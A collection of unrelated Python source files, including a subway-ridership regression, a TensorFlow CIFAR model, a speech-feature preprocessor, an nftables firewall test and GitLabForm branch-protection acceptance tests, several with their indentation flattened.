features = dataframe[['rain', 'precipi', 'Hour', 'meantempi']].join(dummy_units)
values = dataframe[['ENTRIESn_hourly']]
m = len(values)
features, mu, sigma = normalize_features(features)
features['ones'] = np.ones(m)
features_array = np.array(features)
values_array = np.array(values).flatten()
#Set values for alpha, number of iterations.
alpha = 0.1 # please feel free to change this value
num_iterations = 75 # please feel free to change this value
#Initialize theta, perform gradient descent
theta_gradient_descent = np.zeros(len(features.columns))
theta_gradient_descent, cost_history = gradient_descent(features_array,
values_array,
theta_gradient_descent,
alpha,
num_iterations)
prediction = np.dot(features_array, theta_gradient_descent)
return prediction
def compute_r_squared(data, predictions):
SST = ((data-np.mean(data))**2).sum()
SSReg = ((predictions-np.mean(data))**2).sum()
r_squared = SSReg / SST
return r_squared
if __name__ == "__main__":
input_filename = "turnstile_data_master_with_weather.csv"
turnstile_master = pd.read_csv(input_filename)
predicted_values = predictions(turnstile_master)
r_squared = compute_r_squared(turnstile_master['ENTRIESn_hourly'], predicted_values)
    print(r_squared)
|
11547550
|
config = {
# Time in seconds to sleep after every action. Used to deal with slow rendering.
"action-sleep-interval-seconds": 1,
# Timeout when we are searching for an element for the first time.
"action-small-timeout-seconds": 5,
# Timeout when we are searching for an element in lock mode.
"action-mode-timeout-seconds": 15,
# Timeout for wait until action.
"action-large-timeout-seconds": 600,
# Whether we run headless or not.
"run-headless": True,
# The obvious window sizes.
"window-width": 1920,
# The obvious window sizes.
"window-height": 1080,
}
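# Hypothetical illustration (not part of the original module) of how these
# values might be consumed: a generic polling helper that retries a condition
# within one of the configured timeouts, sleeping the configured interval
# between attempts. The function name and default key are assumptions.
import time
def wait_until(condition, timeout_key="action-small-timeout-seconds"):
    """Poll condition() until it returns truthy or the configured timeout elapses."""
    deadline = time.time() + config[timeout_key]
    while time.time() < deadline:
        if condition():
            return True
        time.sleep(config["action-sleep-interval-seconds"])
    return False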
|
11547609
|
from fate_arch.storage._types import StorageTableMetaType, StorageEngine
from fate_arch.storage._types import StandaloneStoreType, EggRollStoreType, \
HDFSStoreType, MySQLStoreType, \
PathStoreType, HiveStoreType, LinkisHiveStoreType, LocalFSStoreType
from fate_arch.storage._types import DEFAULT_ID_DELIMITER, StorageTableOrigin
from fate_arch.storage._session import StorageSessionBase
from fate_arch.storage._table import StorageTableBase, StorageTableMeta
|
11547614
|
import pytest
from stock_indicators import indicators
class TestAroon:
def test_standard(self, quotes):
results = indicators.get_aroon(quotes, 25)
assert 502 == len(results)
assert 477 == len(list(filter(lambda x: x.aroon_up is not None, results)))
assert 477 == len(list(filter(lambda x: x.aroon_down is not None, results)))
assert 477 == len(list(filter(lambda x: x.oscillator is not None, results)))
r = results[210]
assert 100 == float(r.aroon_up)
assert 000 == float(r.aroon_down)
assert 100 == float(r.oscillator)
r = results[293]
assert 000 == float(r.aroon_up)
assert +40 == float(r.aroon_down)
assert -40 == float(r.oscillator)
r = results[298]
assert 000 == float(r.aroon_up)
assert +20 == float(r.aroon_down)
assert -20 == float(r.oscillator)
r = results[458]
assert 0000 == float(r.aroon_up)
assert +100 == float(r.aroon_down)
assert -100 == float(r.oscillator)
r = results[501]
assert +28 == float(r.aroon_up)
assert +88 == float(r.aroon_down)
assert -60 == float(r.oscillator)
def test_bad_data(self, bad_quotes):
r = indicators.get_aroon(bad_quotes, 20)
assert 502 == len(r)
def test_removed(self, quotes):
results = indicators.get_aroon(quotes, 25).remove_warmup_periods()
assert 502 - 25 == len(results)
last = results.pop()
assert +28 == float(last.aroon_up)
assert +88 == float(last.aroon_down)
assert -60 == float(last.oscillator)
def test_exceptions(self, quotes):
from System import ArgumentOutOfRangeException
with pytest.raises(ArgumentOutOfRangeException):
indicators.get_aroon(quotes, 0)
|
11547620
|
import unittest
import os
import json
from reporter_config.Config import Config, Parser
from reporter_config.actions.Drop import DropMsg
class RCDropTest(unittest.TestCase):
def setUp(self):
"""
Example message created by a conv function in a reporter
"""
with open(os.path.dirname(__file__) + '/rc_msg.json', 'r') as f:
self.msg = json.load(f)
def tearDown(self):
pass
def test_01_drop(self):
"""
Load drop.yaml configuration file, parse it and analyze it
"""
        self.parser = Parser(os.path.dirname(__file__) + '/rc_config/drop.yaml')
        self.config = Config(self.parser)
self.assertNotEqual(self.config, None)
self.config.match(self.msg)
|
11547650
|
import hou
from assetDB import AssetDBConnection
from slice import Slice
from fbxUtil import setScaleFactor
# import lib.perforce
from contextlib import closing
from jinja2 import Environment, FileSystemLoader, PackageLoader
from itertools import izip
import os
import random
import sys
# def getP4Connection():
# p4 = getP4Connection.p4
# if not p4.connected():
# try:
# p4.connect()
# except Exception as error:
# if 'check $P4PORT' in str(error):
# raise Exception('Not connected to network')
# return p4
# getP4Connection.p4 = lib.perforce.P4.P4()
# def isInP4(filepath):
# p4 = getP4Connection()
# try:
# info = p4.run('files', filepath.replace('\\', '/'))
# return info is not None
# except Exception as error:
# known_errors = [
# 'no such file',
# 'An empty string is not allowed as a file name',
# "is not under client's root"
# ]
# error_str = str(error)
# if any(error in error_str for error in known_errors):
# return False
# else:
# raise Exception(error)
# def checkOutFile(filepath):
# p4 = getP4Connection()
# inP4 = isInP4(filepath)
# if not inP4 and not os.path.exists(filepath):
# raise Exception('Critical Error: File - %s - does not exist on the local file system.' % filepath)
# if not inP4:
# p4.run('add', filepath)
# else:
# p4.run('edit', filepath)
class DestructibleSlice(Slice):
def __init__(self, blastAssetIdString, meshAssetIdStrings):
super(DestructibleSlice, self).__init__()
self.__blastFamilyGenericComponentWrapperId = str(random.randint(0, sys.maxsize))
self.__netSystemGenericComponentWrapperId = str(random.randint(0, sys.maxsize))
self.__locationComponentId = str(random.randint(0, sys.maxsize))
self.__blastFamilyComponentId = str(random.randint(0, sys.maxsize))
self.__blastMeshDataComponentId = str(random.randint(0, sys.maxsize))
self.__octreeNodeComponentId = str(random.randint(0, sys.maxsize))
self.__blastAssetIdString = blastAssetIdString
self.__meshAssetIdStrings = meshAssetIdStrings
@property
def blastFamilyGenericComponentWrapperId(self):
return self.__blastFamilyGenericComponentWrapperId
@property
def netSystemGenericComponentWrapperId(self):
return self.__netSystemGenericComponentWrapperId
@property
def locationComponentId(self):
return self.__locationComponentId
@property
def blastFamilyComponentId(self):
return self.__blastFamilyComponentId
@property
def blastMeshDataComponentId(self):
return self.__blastMeshDataComponentId
@property
def octreeNodeComponentId(self):
return self.__octreeNodeComponentId
@property
def blastAssetIdString(self):
return self.__blastAssetIdString
@property
def meshAssetIdStrings(self):
return self.__meshAssetIdStrings
def getChunkNames():
prefix = hou.pwd().parm('groupPrefix').eval()
renameNode = hou.node('{0}/HierarchyGroupToBlastChunkOrder'.format(hou.pwd().path()))
geo = renameNode.geometry()
primGroupNames = [group.name() for group in geo.primGroups()]
groupNames = [groupName for groupName in primGroupNames if groupName.startswith(prefix)]
if not groupNames:
raise Exception("No chunks found that start with {0}".format(prefix))
return groupNames
def getFBXFileNames():
chunkNames = getChunkNames()
objectName = hou.pwd().parm('objectName').eval()
return ["{0}_{1}".format(objectName, chunkName) for chunkName in chunkNames]
def getFBXFilePaths():
fileNames = getFBXFileNames()
outputDirectory = hou.pwd().parm('fbxOutputDirectory').eval()
if outputDirectory.endswith('/'):
outputDirectory = outputDirectory[:-1]
return ["{0}/{1}.fbx".format(outputDirectory, fileName) for fileName in fileNames]
# def checkOutAll():
# checkOutBlast()
# checkOutFBX()
# checkOutSlice()
# def checkOutBlast():
# file = hou.pwd().parm('blastOutputFile').eval()
# if file:
# checkOutFile(file)
# def checkOutFBX():
# files = getFBXFilePaths()
# for file in files:
# checkOutFile(file)
# def checkOutSlice():
# file = hou.pwd().parm('sliceOutputFile').eval()
# if file:
# checkOutFile(file)
def exportFBX():
chunkNames = getChunkNames()
fileNames = getFBXFileNames()
singleChunkName = hou.pwd().parm('singleChunkName')
singleChunkFile = hou.pwd().parm('singleChunkFile')
export = hou.pwd().parm('fbxExportSingleChunk')
restoreSingleChunkName = singleChunkName.unexpandedString()
restoreSingleChunkFile = singleChunkFile.unexpandedString()
for chunkName, fileName in izip(chunkNames, fileNames):
singleChunkName.set(chunkName)
singleChunkFile.set(fileName)
export.pressButton()
setScaleFactor(fileName)
singleChunkFile.set(restoreSingleChunkFile, follow_parm_reference=False)
singleChunkName.set(restoreSingleChunkName, follow_parm_reference=False)
def exportSlice():
# Path to the 'Assets' folder or similar
lumberyardAssetPath = hou.pwd().parm('lumberyardAssetPath').evalAsString().replace('\\', '/').lower()
if lumberyardAssetPath and lumberyardAssetPath[-1] != '/':
lumberyardAssetPath += '/'
# Path to the relative root of cached data e.g. 'pc/Assets/'
lumberyardCacheRelativeRoot = hou.pwd().parm('lumberyardCacheRelativeRoot').evalAsString().replace('\\', '/').lower()
if lumberyardCacheRelativeRoot and lumberyardCacheRelativeRoot[-1] != '/':
lumberyardCacheRelativeRoot += '/'
# Path to assetdb.sqlite for the project
lumberyardDatabasePath = hou.pwd().parm('lumberyardDatabasePath').evalAsString().replace('\\', '/').lower()
slicePath = hou.pwd().parm('sliceOutputFile').eval()
blastAssetPath = hou.pwd().parm('blastOutputFile').eval()
relativeBlastAssetPath = blastAssetPath.lower().replace(lumberyardAssetPath, '')
relativeCachedBlastAssetPath = '{0}{1}'.format(lumberyardCacheRelativeRoot, relativeBlastAssetPath)
fbxFilePaths = getFBXFilePaths()
relativeFbxPaths = [fbxPath.lower().replace(lumberyardAssetPath, '') for fbxPath in fbxFilePaths]
relativeCachedCgfPaths = [
'{0}{1}'.format(lumberyardCacheRelativeRoot, fbxPath.replace('.fbx', '.cgf'))
for fbxPath in relativeFbxPaths]
with AssetDBConnection(lumberyardDatabasePath) as assetDB:
blastAssetIdString = assetDB.getAssetId(relativeCachedBlastAssetPath, relativeBlastAssetPath)
meshAssetIdStrings = [
assetDB.getAssetId(cgfPath, fbxPath)
for fbxPath, cgfPath in izip(relativeFbxPaths, relativeCachedCgfPaths)]
jinjaEnv = Environment(loader=PackageLoader('blastExport', 'templates'), autoescape=True)
template = jinjaEnv.get_template('destructible_slice.xml')
destructibleSliceData = DestructibleSlice(blastAssetIdString, meshAssetIdStrings)
destructibleSliceData.name = hou.pwd().parm('objectName').eval()
with open(slicePath, 'w') as sliceFile:
sliceFile.write(template.render(destructibleSliceData))
def onCreated(node):
node.setColor(hou.Color((1.0, 0.6, 0.0)))
|
11547698
|
import sys
sys.path.append('../../pretrain')
# pretrain
from ops import max_pool2d,\
conv2d, fc_layer,\
get_shape
from augment_op import random_distort, random_crop, random_flip_rl, resize
import tensorflow as tf
slim = tf.contrib.slim
def conv1(x, is_training, reuse=False):
'''
Args:
x - 4D tensor [batch, 32, 32, 3]
is_training - bool tensor
reuse - bool
Return:
last, logits
last - 2D tensor
logits - 2D tensor
'''
r = tf.cond(
is_training,
lambda : random_flip_rl(
random_crop(
tf.pad(
x, [[0,0],[4,4],[4,4],[0,0]],
"CONSTANT"), 32, 32)),
lambda : x)
def leaky_relu_custom(alpha):
def func(features):
return tf.nn.leaky_relu(features, 1/alpha)
return func
with tf.variable_scope("NIN", reuse=reuse):
with slim.arg_scope([slim.conv2d], weights_initializer=tf.contrib.slim.variance_scaling_initializer(), weights_regularizer=slim.l2_regularizer(0.00004)):
with slim.arg_scope([slim.conv2d], stride=1, padding='SAME', activation_fn=leaky_relu_custom(5.5)):
with slim.arg_scope(([slim.dropout]), is_training=is_training, keep_prob=0.5):
n = r
n = slim.conv2d(n, 192, [5, 5], scope='conv2d_0')
n = slim.conv2d(n, 160, [1, 1], scope='conv2d_1')
n = slim.conv2d(n, 96, [1, 1], scope='conv2d_2')
n = slim.max_pool2d(n, [3,3], stride=2, padding='SAME')
n = slim.dropout(n)
n = slim.conv2d(n, 192, [5, 5], scope='conv2d_3')
n = slim.conv2d(n, 192, [1, 1], scope='conv2d_4')
n = slim.conv2d(n, 192, [1, 1], scope='conv2d_5')
n = slim.avg_pool2d(n, [3,3], stride=2, padding='SAME')
n = slim.dropout(n)
n = slim.conv2d(n, 192, [3, 3], scope='conv2d_6')
n = slim.conv2d(n, 192, [1, 1], activation_fn=None, scope='conv2d_7')
last = tf.reduce_mean(n, [1,2])
n = tf.nn.relu(n)
n = slim.conv2d(n, 100, [1,1], activation_fn=None, scope='conv2d_8')
logits = tf.reduce_mean(n, [1,2])
return last, logits
#=============================================================================================================================================#
CONV_DICT = {
'cifar':
{
'conv1' : conv1
},
'imgnet32':
{
'conv1' : conv1
},
'icml_cifar':
{
'conv1' : conv1
}
}
#=============================================================MANAGER====================================================================#
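# --- Illustrative usage sketch (not part of the original file) --------------
# The conv1 docstring describes a [batch, 32, 32, 3] input and a boolean
# `is_training` tensor; under those assumptions the network could be wired
# up as below (TF1 graph mode, placeholder names are hypothetical).
if __name__ == '__main__':
    images = tf.placeholder(tf.float32, [None, 32, 32, 3], name='images')
    is_training = tf.placeholder(tf.bool, [], name='is_training')
    # `last` is the 192-dim pooled feature, `logits` the 100-way output.
    last, logits = CONV_DICT['cifar']['conv1'](images, is_training)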
|
11547766
|
from typing import Callable
import numpy as np
from python_speech_features import mfcc, fbank, logfbank, ssc, delta
from neuralmonkey.readers.audio_reader import Audio
# pylint: disable=invalid-name
def SpeechFeaturesPreprocessor(feature_type: str = 'mfcc',
delta_order: int = 0,
delta_window: int = 2,
**kwargs) -> Callable:
"""Calculate speech features.
First, the given type of features (e.g. MFCC) is computed using a window
of length `winlen` and step `winstep`; for additional keyword arguments
(specific to each feature type), see
http://python-speech-features.readthedocs.io/. Then, delta features up to
`delta_order` are added.
By default, 13 MFCCs per frame are computed. To add delta and delta-delta
features (resulting in 39 coefficients per frame), set `delta_order=2`.
Arguments:
feature_type: mfcc, fbank, logfbank or ssc (default is mfcc)
delta_order: maximum order of the delta features (default is 0)
delta_window: window size for delta features (default is 2)
**kwargs: keyword arguments for the appropriate function from
python_speech_features
Returns:
        A preprocessing callable that maps an `Audio` object to a numpy
        array of shape [num_frames, num_features].
"""
if feature_type not in FEATURE_TYPES:
raise ValueError(
'Unknown speech feature type "{}"'.format(feature_type))
def preprocess(audio: Audio) -> np.ndarray:
features = [FEATURE_TYPES[feature_type](
audio.data, samplerate=audio.rate, **kwargs)]
for _ in range(delta_order):
features.append(delta(features[-1], delta_window))
return np.concatenate(features, axis=1)
return preprocess
def _fbank(*args, **kwargs) -> np.ndarray:
feat, _ = fbank(*args, **kwargs)
return feat
FEATURE_TYPES = {'mfcc': mfcc,
'fbank': _fbank,
'logfbank': logfbank,
'ssc': ssc}
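# --- Illustrative usage sketch (not part of the original file) --------------
# The docstring above describes building a preprocessor and applying it to
# an Audio object; SimpleNamespace stands in for Audio here since the
# preprocessor only reads the `.data` and `.rate` attributes.
if __name__ == '__main__':
    from types import SimpleNamespace
    fake_audio = SimpleNamespace(rate=16000, data=np.random.randn(16000))
    preprocess = SpeechFeaturesPreprocessor(feature_type='mfcc', delta_order=2)
    print(preprocess(fake_audio).shape)  # e.g. (num_frames, 39)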
|
11547767
|
import asyncio
import gta.utils
# The following metadata will not be processed but is recommended
# Author name and E-Mail
__author__ = '<NAME> <<EMAIL>>'
# Status of the script: Use one of 'Prototype', 'Development', 'Production'
__status__ = 'Development'
# The following metadata will be parsed and should always be provided
# Version number: This should always be a string and formatted in the x.x.x notation
__version__ = '0.0.1'
# A list of dependencies in the requirement specifiers format
# See: https://pip.pypa.io/en/latest/reference/pip_install.html#requirement-specifiers
__dependencies__ = ('aiohttp>=0.15.3',)
@asyncio.coroutine
def main():
"""
Does absolutely nothing but show you how to provide metadata.
"""
logger = gta.utils.get_logger('gta.metadata')
logger.debug('Hello from the metadata example')
|
11547786
|
import os
import subprocess
from time import sleep
from oeqa.oetest import oeRuntimeTest
class NftablesTest(oeRuntimeTest):
def check_ssh_connection(self):
'''Check SSH connection to DUT port 2222'''
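        # Non-interactive SSH probe: suppress known-hosts handling, use a 3 s
        # connect timeout, and run a trivial remote command ('ls') so the
        # return code and captured output reflect whether port 2222 answered.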
process = subprocess.Popen(("ssh -o UserKnownHostsFile=/dev/null " \
"-o ConnectTimeout=3 " \
"-o StrictHostKeyChecking=no root@" + \
self.target.ip +" -p 2222 ls").split(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
output, err = process.communicate()
output = output.decode("utf-8")
returncode = process.returncode
return returncode, output
def add_test_table(self):
self.target.run("nft add table ip test")
self.target.run("nft add chain ip test input {type filter hook input priority 0\;}")
self.target.run("nft add chain ip test donothing")
self.target.run("nft add chain ip test prerouting {type nat hook prerouting priority 0 \;}")
self.target.run("nft add chain ip test postrouting {type nat hook postrouting priority 100 \;}")
def delete_test_table(self):
self.target.run("nft delete table ip test")
def test_reject(self):
'''Test rejecting SSH with nftables'''
self.add_test_table()
self.target.run("nft add rule ip test input tcp dport 2222 reject")
self.target.run("nft add rule ip test input goto donothing")
returncode, output = self.check_ssh_connection()
self.delete_test_table()
self.assertIn("Connection refused", output, msg="Error message: %s" % output)
def test_drop(self):
'''Test dropping SSH with nftables'''
self.add_test_table()
self.target.run("nft add rule ip test input tcp dport 2222 drop")
self.target.run("nft add rule ip test input goto donothing")
returncode, output = self.check_ssh_connection()
self.delete_test_table()
self.assertIn("Connection timed out", output, msg="Error message: %s" % output)
def test_redirect(self):
'''Test redirecting port'''
# Check that SSH can't connect to port 2222
returncode, output = self.check_ssh_connection()
self.assertNotEqual(returncode, 0, msg="Error message: %s" % output)
self.add_test_table()
self.target.run("nft add rule ip test prerouting tcp dport 2222 redirect to 22")
# Check that SSH can connect to port 2222
returncode, output = self.check_ssh_connection()
self.assertEqual(returncode, 0, msg="Error message: %s" % output)
self.delete_test_table()
# Check that SSH can't connect to port 2222
returncode, output = self.check_ssh_connection()
self.assertNotEqual(returncode, 0, msg="Error message: %s" % output)
|
11547794
|
from django.db import models
from core.models import AtmosphereUser
from uuid import uuid4
class SSHKey(models.Model):
name = models.CharField(max_length=256)
uuid = models.CharField(max_length=36, unique=True, default=uuid4)
pub_key = models.TextField()
atmo_user = models.ForeignKey(AtmosphereUser)
def __unicode__(self):
return "%s - %s Key:%s" %\
(self.atmo_user, self.name, self.pub_key)
@staticmethod
def keys_for_group(group):
"""
TODO: include leadership in the filter
"""
return SSHKey.objects.filter(atmo_user__memberships__group=group)
class Meta:
db_table = "ssh_key"
app_label = "core"
def get_user_ssh_keys(username):
user = AtmosphereUser.objects.get(username=username)
return SSHKey.objects.filter(atmo_user=user)
|
11547841
|
import faster_than_requests as requests
import time
import datetime
import urllib.request
print ("Faster")
start = datetime.datetime.now()
requests.get2str('http://localhost/sureflap-master/LockOutsite.php')
end = datetime.datetime.now()
time_taken = end - start
print('Time: ', time_taken)
start = datetime.datetime.now()
requests.get2str('http://localhost/sureflap-master/UnLock.php')
end = datetime.datetime.now()
time_taken = end - start
print('Time: ', time_taken)
print ("UrlLib")
start = datetime.datetime.now()
webUrl = urllib.request.urlopen('http://localhost/sureflap-master/LockOutsite.php')
end = datetime.datetime.now()
time_taken = end - start
print('Time: ', time_taken)
start = datetime.datetime.now()
webUrl = urllib.request.urlopen('http://localhost/sureflap-master/UnLock.php')
end = datetime.datetime.now()
time_taken = end - start
print('Time: ', time_taken)
|
11547852
|
import pytest
from gitlabform.gitlab import AccessLevel
from tests.acceptance import (
run_gitlabform,
DEFAULT_README,
get_gitlab,
get_random_name,
)
gl = get_gitlab()
class TestBranches:
def test__old_api(self, gitlab, group_and_project, branch):
protect_branch_but_allow_all = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
developers_can_push: true
developers_can_merge: true
"""
run_gitlabform(protect_branch_but_allow_all, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is True
assert the_branch["developers_can_push"] is True
assert the_branch["developers_can_merge"] is True
# @pytest.mark.skipif(
# gl.has_no_license(), reason="this test requires a GitLab license (Paid/Trial)"
# )
# def test__code_owners_approval(self, gitlab, group_and_project, branch):
# branch_access_levels = gitlab.get_branch_access_levels(
# group_and_project, branch
# )
# assert branch_access_levels["code_owner_approval_required"] is False
#
# protect_branch_with_code_owner_approval_required = f"""
# projects_and_groups:
# {group_and_project}:
# branches:
# {branch}:
# protected: true
# developers_can_push: false
# developers_can_merge: true
# code_owner_approval_required: true
# """
#
# run_gitlabform(
# protect_branch_with_code_owner_approval_required, group_and_project
# )
#
# branch_access_levels = gitlab.get_branch_access_levels(
# group_and_project, branch
# )
# assert branch_access_levels["code_owner_approval_required"] is True
def test__old_api_other(self, gitlab, group_and_project, branch):
protect_branch_and_disallow_all = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
developers_can_push: false
developers_can_merge: false
"""
run_gitlabform(protect_branch_and_disallow_all, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is True
assert the_branch["developers_can_push"] is False
assert the_branch["developers_can_merge"] is False
def test__mixed_old_and_new_api(
self,
gitlab,
group_and_project,
branch,
other_branch,
):
mixed_config_with_access_levels = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
developers_can_push: false
developers_can_merge: true
{other_branch}:
protected: true
push_access_level: {AccessLevel.DEVELOPER.value}
merge_access_level: {AccessLevel.DEVELOPER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(mixed_config_with_access_levels, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is True
assert the_branch["developers_can_push"] is False
assert the_branch["developers_can_merge"] is True
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(group_and_project, other_branch)
assert push_access_levels == [AccessLevel.DEVELOPER.value]
assert merge_access_levels == [AccessLevel.DEVELOPER.value]
assert push_access_user_ids == []
assert merge_access_user_ids == []
        assert unprotect_access_level == AccessLevel.MAINTAINER.value
@pytest.mark.skipif(
gl.has_no_license(), reason="this test requires a GitLab license (Paid/Trial)"
)
def test__allow_user_ids(
self,
gitlab,
group_and_project,
branch,
make_user,
):
user_allowed_to_push = make_user(AccessLevel.DEVELOPER)
user_allowed_to_merge = make_user(AccessLevel.DEVELOPER)
user_allowed_to_push_and_merge = make_user(AccessLevel.DEVELOPER)
config_with_user_ids = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
allowed_to_push:
- user_id: {user_allowed_to_push.id}
- access_level: {AccessLevel.NO_ACCESS.value}
- user: {user_allowed_to_push_and_merge.name}
allowed_to_merge:
- access_level: {AccessLevel.DEVELOPER.value}
- user_id: {user_allowed_to_merge.id}
- user: {user_allowed_to_push_and_merge.name}
"""
run_gitlabform(config_with_user_ids, group_and_project)
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
_,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_levels == [AccessLevel.NO_ACCESS.value]
assert merge_access_levels == [AccessLevel.DEVELOPER.value]
assert push_access_user_ids == sorted(
[
user_allowed_to_push.id,
user_allowed_to_push_and_merge.id,
]
)
assert merge_access_user_ids == sorted(
[
user_allowed_to_merge.id,
user_allowed_to_push_and_merge.id,
]
)
@pytest.mark.skipif(
gl.has_no_license(), reason="this test requires a GitLab license (Paid/Trial)"
)
def test__allow_more_than_one_user_by_ids(
self,
gitlab,
group_and_project,
branch,
make_user,
):
first_user = make_user(AccessLevel.DEVELOPER)
second_user = make_user(AccessLevel.DEVELOPER)
third_user = make_user(AccessLevel.DEVELOPER)
config_with_more_user_ids = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
allowed_to_push:
- access_level: {AccessLevel.MAINTAINER.value}
- user_id: {first_user.id}
- user_id: {second_user.id}
- user: {third_user.name}
allowed_to_merge:
- access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(config_with_more_user_ids, group_and_project)
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
_,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_levels == [AccessLevel.MAINTAINER.value]
assert merge_access_levels == [AccessLevel.MAINTAINER.value]
assert push_access_user_ids == sorted(
[
first_user.id,
second_user.id,
third_user.id,
]
)
assert merge_access_user_ids == []
def test__old_api_then_new_api_and_unprotect(
self, gitlab, group_and_project, branch
):
config_protect_branch_with_old_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
developers_can_push: true
developers_can_merge: true
"""
run_gitlabform(config_protect_branch_with_old_api, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is True
assert the_branch["developers_can_push"] is True
assert the_branch["developers_can_merge"] is True
config_protect_branch_with_new_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
push_access_level: {AccessLevel.NO_ACCESS.value}
merge_access_level: {AccessLevel.MAINTAINER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(config_protect_branch_with_new_api, group_and_project)
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_levels == [AccessLevel.NO_ACCESS.value]
assert merge_access_levels == [AccessLevel.MAINTAINER.value]
assert push_access_user_ids == []
assert merge_access_user_ids == []
        assert unprotect_access_level == AccessLevel.MAINTAINER.value
config_protect_branch_unprotect = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: false
"""
run_gitlabform(config_protect_branch_unprotect, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is False
def test__new_api_then_old_api_and_unprotect(
self, gitlab, group_and_project, branch
):
config_protect_branch_with_new_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
push_access_level: {AccessLevel.NO_ACCESS.value}
merge_access_level: {AccessLevel.MAINTAINER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(config_protect_branch_with_new_api, group_and_project)
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_levels == [AccessLevel.NO_ACCESS.value]
assert merge_access_levels == [AccessLevel.MAINTAINER.value]
assert push_access_user_ids == []
assert merge_access_user_ids == []
        assert unprotect_access_level == AccessLevel.MAINTAINER.value
config_protect_branch_with_old_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
developers_can_push: true
developers_can_merge: true
"""
run_gitlabform(config_protect_branch_with_old_api, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is True
assert the_branch["developers_can_push"] is True
assert the_branch["developers_can_merge"] is True
config_protect_branch_unprotect = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: false
"""
run_gitlabform(config_protect_branch_unprotect, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is False
def test__unprotect_when_the_rest_of_the_parameters_are_still_specified_old_api(
self, gitlab, group_and_project, branch
):
config_protect_branch_with_old_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
developers_can_push: true
developers_can_merge: true
"""
run_gitlabform(config_protect_branch_with_old_api, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is True
assert the_branch["developers_can_push"] is True
assert the_branch["developers_can_merge"] is True
config_unprotect_branch_with_old_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: false
developers_can_push: true
developers_can_merge: true
"""
run_gitlabform(config_unprotect_branch_with_old_api, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is False
def test__unprotect_when_the_rest_of_the_parameters_are_still_specified_new_api(
self, gitlab, group_and_project, branch
):
config_protect_branch_with_new_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
push_access_level: {AccessLevel.NO_ACCESS.value}
merge_access_level: {AccessLevel.MAINTAINER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(config_protect_branch_with_new_api, group_and_project)
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_levels == [AccessLevel.NO_ACCESS.value]
assert merge_access_levels == [AccessLevel.MAINTAINER.value]
assert push_access_user_ids == []
assert merge_access_user_ids == []
        assert unprotect_access_level == AccessLevel.MAINTAINER.value
config_unprotect_branch_with_new_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: false
push_access_level: {AccessLevel.NO_ACCESS.value}
merge_access_level: {AccessLevel.MAINTAINER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(config_unprotect_branch_with_new_api, group_and_project)
# old API
        the_branch = gitlab.get_branch(group_and_project, branch)
        assert the_branch["protected"] is False
# new API
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_levels is None
assert merge_access_levels is None
assert push_access_user_ids is None
assert merge_access_user_ids is None
assert unprotect_access_level is None
def test__config_with_access_level_names(self, gitlab, group_and_project, branch):
config_with_access_levels_names = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
push_access_level: no_access # note "_" or " " and the various
merge_access_level: Developer # case in each line. it should not
unprotect_access_level: MAINTAINER # matter as we allow any case.
"""
run_gitlabform(config_with_access_levels_names, group_and_project)
(
push_access_level,
merge_access_level,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_level == [AccessLevel.NO_ACCESS.value]
